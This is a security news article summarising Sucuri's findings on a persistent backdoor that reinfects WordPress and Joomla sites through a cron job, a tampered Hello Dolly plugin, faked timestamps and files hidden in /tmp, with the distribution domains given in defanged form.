Source: Cyware | By Ryan Stewart
• Depending on the type of platform, the malware determines the method it will use to further infect the website files.
• The malware operators are propagating the malware through hestonsflorists[.]com.
A new backdoor malware has been found re-infecting the files even after the website owners have cleaned their websites. It primarily targets to WordPress-based and Joomla-based websites to initiate its infection process.
What’s new about the malware?
In its latest blog post, Sucuri has mentioned that the malware’s persistence on a website was “being created by a cron that was scheduled to download malware from a third party domain.”
The malware’s source code has been configured only to detect WordPress and Joomla based websites. Depending on the type of platform, the malware determines the method it will use to further infect the website files.
How does it operate?
Sucuri researchers cited an instance where one of its clients has been affected by persistent malware infection. The client’s website was using WordPress. It abused the default ‘Hello Dolly’ WordPress plugin to further its infection process.
“The malware proceeded to preserve the existing timestamps of the default WordPress plugin “Hello, Dolly”, then attempts to hide base64 encoded malware to the plugin file ./wp-content/plugins/hello.php,” said the Sucuri researchers in a blog post.
The backdoor malware maintained its foothold despite the sanitation process on the website.
In a span of 5-8 years, the malware operators have changed the domain for the distribution of the malware. They have shifted the old hestonsflorist[.]com domain to the current one at hestonsflorists[.]com to propagate the malware.
“The attackers even assign the same fake timestamp (201104202045) using touch to try and trick webmasters — which nowadays would probably be even more suspicious, since the fake timestamp reflects a date over 8 years old,” added the researchers.
Researchers further note that the malicious files of this backdoor malware are served from the ‘/tmp directory’, which is rarely scanned or monitored and makes it difficult to detect.